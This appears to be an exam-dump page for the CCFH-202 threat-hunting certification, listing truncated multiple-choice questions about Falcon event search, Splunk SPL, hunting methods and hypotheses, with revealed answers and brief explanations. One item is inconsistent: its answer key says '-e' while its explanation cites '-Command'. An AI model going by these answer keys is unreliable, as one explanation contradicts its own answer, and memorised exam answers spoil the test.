CCFH-202 exam

Refer to Exhibit. Falcon detected the above file attempting to execute. At initial glance; what indicators can we use to provide an initial analysis of the file?A . VirusTotal, Hybrid Analysis, and Google pivot indicator lights enabledB . File name, path, Local and Global prevalence within the environmentC . File...

Which SPL (Splunk) field name can be used to automatically convert Unix times (Epoch) to UTC readable time within the Flacon Event Search?A . utc_timeB . conv_timeC . _timeD . timeView AnswerAnswer: C Explanation: _time is the SPL (Splunk) field name that can be used to automatically convert Unix times...

To find events that are outliers inside a network,___________is the best hunting method to use.A . time-basedB . machine learningC . searchingD . stackingView AnswerAnswer: D Explanation: Stacking (Frequency Analysis) is the best hunting method to use to find events that are outliers inside a network. Stacking involves grouping events...

What Search page would help a threat hunter differentiate testing, DevOPs, or general user activity from adversary behavior?A . Hash SearchB . IP SearchC . Domain SearchD . User SearchView AnswerAnswer: D Explanation: User Search is a search page that allows a threat hunter to search for user activity across...

The Falcon Detections page will attempt to decode Encoded PowerShell Command line parameters when which PowerShell Command line parameter is present?A . -CommandB . -HiddenC . -eD . -nopView AnswerAnswer: C Explanation: The Falcon Detections page will attempt to decode Encoded PowerShell Command line parameters when the -Command parameter is...

SPL (Splunk) eval statements can be used to convert Unix times (Epoch) into UTC readable time Which eval function is correct^A . nowB . typeofC . strftimeD . relative timeView AnswerAnswer: C Explanation: The strftime eval function is used to convert Unix times (Epoch) into UTC readable time. It takes...

Which structured analytic technique contrasts different hypotheses to determine which is the best leading (prioritized) hypothesis?A . Model hunting frameworkB . Competitive analysisC . Analysis of competing hypothesesD . Key assumptions checkView AnswerAnswer: C Explanation: Analysis of competing hypotheses is a structured analytic technique that contrasts different hypotheses to determine...

The help desk is reporting an increase in calls related to user accounts being locked out over the last few days. You suspect that this could be an attack by an adversary against your organization. Select the best hunting hypothesis from the following:A . A zero-day vulnerability is being exploited...

Which field should you reference in order to find the system time of a *FileWritten event?A . ContextTimeStamp_decimalB . FileTimeStamp_decimalC . ProcessStartTime_decimalD . timestampView AnswerAnswer: A Explanation: ContextTimeStamp_decimal is the field that shows the system time of the event that triggered the sensor to send data to the cloud. In...

When exporting the results of the following event search, what data is saved in the exported file (assuming Verbose Mode)? event_simpleName=*Written | stats count by ComputerNameA . The text of the queryB . The results of the Statistics tabC . No data Results can only be exported when the "table"...